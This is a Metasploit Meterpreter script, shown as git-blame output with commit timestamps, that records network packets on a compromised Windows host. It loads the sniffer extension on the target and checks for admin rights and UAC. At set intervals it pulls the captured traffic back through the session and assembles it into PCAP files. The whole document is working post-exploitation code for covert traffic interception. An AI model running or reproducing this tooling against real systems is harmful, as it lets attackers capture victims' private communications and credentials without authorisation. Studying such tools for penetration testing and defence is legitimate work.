2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2010-06-23 00:50:14 +00:00
|
|
|
# $Revision$
|
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
2010-11-02 02:05:12 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
################## Variable Declarations ##################
|
|
|
|
|
|
|
|
@client = client
|
|
|
|
|
|
|
|
# Interval for recording packets
|
|
|
|
rec_time = 30
|
|
|
|
|
|
|
|
# Interface ID
|
|
|
|
int_id = nil
|
|
|
|
|
|
|
|
# List Interfaces
|
|
|
|
list_int = nil
|
|
|
|
|
|
|
|
# Log Folder
|
|
|
|
log_dest = nil
|
|
|
|
@exec_opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false, "Help menu."],
|
2010-01-22 23:49:15 +00:00
|
|
|
"-t" => [ true, "Time interval in seconds between recollection of packet, default 30 seconds."],
|
2010-11-02 02:05:12 +00:00
|
|
|
"-i" => [ true, "Interface ID number where all packet capture will be done."],
|
|
|
|
"-li" => [ false, "List interfaces that can be used for capture."],
|
|
|
|
"-l" => [ true, "Specify and alternate folder to save PCAP file."]
|
2009-07-13 01:36:08 +00:00
|
|
|
)
|
2010-11-02 02:05:12 +00:00
|
|
|
meter_type = client.platform
|
|
|
|
|
|
|
|
################## Function Declarations ##################
|
|
|
|
|
|
|
|
# Usage Message Function
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def usage
|
|
|
|
print_line "Meterpreter Script for capturing packets in to a PCAP file"
|
|
|
|
print_line "on a target host given a interface ID."
|
|
|
|
print_line(@exec_opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
|
|
|
# Wrong Meterpreter Version Message Function
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def wrong_meter_version(meter = meter_type)
|
|
|
|
print_error("#{meter} version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
|
|
|
# Function for creating log folder and returning log pa
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def log_file(log_path = nil)
|
|
|
|
#Get hostname
|
|
|
|
host = @client.sys.config.sysinfo["Computer"]
|
|
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
|
|
|
|
# Create a directory for the logs
|
|
|
|
if log_path
|
|
|
|
logs = ::File.join(log_path, 'logs', 'packetrecorder', host + filenameinfo )
|
|
|
|
else
|
|
|
|
logs = ::File.join(Msf::Config.log_directory, "scripts", 'packetrecorder', host + filenameinfo )
|
|
|
|
end
|
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
#logfile name
|
|
|
|
logfile = logs + ::File::Separator + host + filenameinfo + ".cap"
|
2011-01-25 02:24:37 +00:00
|
|
|
return Rex::FileUtils.clean_path(logfile)
|
2010-11-02 02:05:12 +00:00
|
|
|
end
|
2009-07-13 01:36:08 +00:00
|
|
|
|
|
|
|
#Function for Starting Capture
|
2010-11-02 02:05:12 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def startsniff(interface_id)
|
2009-07-13 01:36:08 +00:00
|
|
|
begin
|
2009-10-25 20:57:23 +00:00
|
|
|
#Load Sniffer module
|
2010-11-02 02:05:12 +00:00
|
|
|
@client.core.use("sniffer")
|
|
|
|
print_status("Starting Packet capture on interface #{interface_id}")
|
2009-10-25 20:57:23 +00:00
|
|
|
#starting packet capture with a buffer size of 200,000 packets
|
2010-11-02 02:05:12 +00:00
|
|
|
@client.sniffer.capture_start(interface_id, 200000)
|
|
|
|
print_good("Packet capture started")
|
2009-07-13 01:36:08 +00:00
|
|
|
rescue ::Exception => e
|
2009-10-25 20:57:23 +00:00
|
|
|
print_status("Error Starting Packet Capture: #{e.class} #{e}")
|
2010-11-02 02:05:12 +00:00
|
|
|
raise Rex::Script::Completed
|
2009-07-13 01:36:08 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#Function for Recording captured packets into PCAP file
|
2010-11-02 02:05:12 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
def packetrecord(packtime, logfile,intid)
|
2010-01-22 23:49:15 +00:00
|
|
|
begin
|
|
|
|
rec = 1
|
|
|
|
print_status("Packets being saved in to #{logfile}")
|
2010-11-02 02:05:12 +00:00
|
|
|
print_status("Packet capture interval is #{packtime} Seconds")
|
2010-01-22 23:49:15 +00:00
|
|
|
#Inserting Packets every number of seconds specified
|
|
|
|
while rec == 1
|
2009-07-13 01:36:08 +00:00
|
|
|
path_cap = logfile
|
|
|
|
path_raw = logfile + '.raw'
|
|
|
|
fd = ::File.new(path_raw, 'wb+')
|
|
|
|
#Flushing Buffers
|
2010-11-02 02:05:12 +00:00
|
|
|
res = @client.sniffer.capture_dump(intid)
|
2009-07-13 01:36:08 +00:00
|
|
|
bytes_all = res[:bytes] || 0
|
|
|
|
bytes_got = 0
|
|
|
|
bytes_pct = 0
|
|
|
|
while (bytes_all > 0)
|
2010-11-02 02:05:12 +00:00
|
|
|
res = @client.sniffer.capture_dump_read(intid,1024*512)
|
2009-07-13 01:36:08 +00:00
|
|
|
bytes_got += res[:bytes]
|
|
|
|
pct = ((bytes_got.to_f / bytes_all.to_f) * 100).to_i
|
|
|
|
if(pct > bytes_pct)
|
|
|
|
bytes_pct = pct
|
|
|
|
end
|
|
|
|
break if res[:bytes] == 0
|
2010-01-22 23:49:15 +00:00
|
|
|
fd.write(res[:data])
|
|
|
|
end
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
fd.close
|
|
|
|
#Converting raw file to PCAP
|
|
|
|
fd = nil
|
|
|
|
if(::File.exist?(path_cap))
|
|
|
|
fd = ::File.new(path_cap, 'ab+')
|
|
|
|
else
|
|
|
|
fd = ::File.new(path_cap, 'wb+')
|
|
|
|
fd.write([0xa1b2c3d4, 2, 4, 0, 0, 65536, 1].pack('NnnNNNN'))
|
|
|
|
end
|
|
|
|
od = ::File.new(path_raw, 'rb')
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
# TODO: reorder packets based on the ID (only an issue if the buffer wraps)
|
|
|
|
while(true)
|
|
|
|
buf = od.read(20)
|
|
|
|
break if not buf
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
idh,idl,thi,tlo,len = buf.unpack('N5')
|
|
|
|
break if not len
|
|
|
|
if(len > 10000)
|
|
|
|
print_error("Corrupted packet data (length:#{len})")
|
|
|
|
break
|
|
|
|
end
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
pkt_ts = Rex::Proto::SMB::Utils.time_smb_to_unix(thi,tlo)
|
|
|
|
pkt = od.read(len)
|
|
|
|
fd.write([pkt_ts,0,len,len].pack('NNNN')+pkt)
|
|
|
|
end
|
|
|
|
od.close
|
|
|
|
fd.close
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
::File.unlink(path_raw)
|
|
|
|
sleep(2)
|
|
|
|
sleep(packtime.to_i)
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-01-22 23:49:15 +00:00
|
|
|
end
|
2009-07-13 01:36:08 +00:00
|
|
|
rescue::Exception => e
|
|
|
|
print("\n")
|
2010-01-22 23:49:15 +00:00
|
|
|
print_status("#{e.class} #{e}")
|
2010-11-02 02:05:12 +00:00
|
|
|
print_good("Stopping Packet sniffer...")
|
|
|
|
@client.sniffer.capture_stop(intid)
|
2009-07-13 01:36:08 +00:00
|
|
|
end
|
|
|
|
end
|
2010-11-02 02:05:12 +00:00
|
|
|
|
|
|
|
# Function for listing interfaces
|
|
|
|
# ------------------------------------------------------------------------------
|
|
|
|
def int_list()
|
|
|
|
@client.core.use("sniffer")
|
|
|
|
ifaces = @client.sniffer.interfaces()
|
|
|
|
|
|
|
|
print_line()
|
|
|
|
|
|
|
|
ifaces.each do |i|
|
|
|
|
print_line(sprintf("%d - '%s' ( type:%d mtu:%d usable:%s dhcp:%s wifi:%s )",
|
|
|
|
i['idx'], i['description'],
|
|
|
|
i['type'], i['mtu'], i['usable'], i['dhcp'], i['wireless'])
|
2010-01-22 23:49:15 +00:00
|
|
|
)
|
2010-11-02 02:05:12 +00:00
|
|
|
end
|
2009-07-13 01:36:08 +00:00
|
|
|
|
2010-11-02 02:05:12 +00:00
|
|
|
print_line()
|
|
|
|
raise Rex::Script::Completed
|
2009-07-13 01:36:08 +00:00
|
|
|
end
|
2010-11-02 02:05:12 +00:00
|
|
|
################## Main ##################
|
|
|
|
@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
when "-i"
|
|
|
|
int_id = val.to_i
|
|
|
|
when "-l"
|
|
|
|
log_dest = val
|
|
|
|
when "-li"
|
|
|
|
int_list
|
|
|
|
when "-t"
|
|
|
|
rec_time = val
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
# Check for Version of Meterpreter
|
|
|
|
wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
|
|
|
|
if !int_id.nil?
|
|
|
|
if not is_uac_enabled? or is_admin?
|
|
|
|
pcap_file = log_file(log_dest)
|
|
|
|
startsniff(int_id)
|
|
|
|
packetrecord(rec_time,pcap_file,int_id)
|
|
|
|
else
|
|
|
|
print_error("UAC or Access Denied")
|
2009-07-13 01:36:08 +00:00
|
|
|
end
|
2010-09-09 16:09:27 +00:00
|
|
|
else
|
2010-11-02 02:05:12 +00:00
|
|
|
usage
|
2010-09-09 16:09:27 +00:00
|
|
|
end
|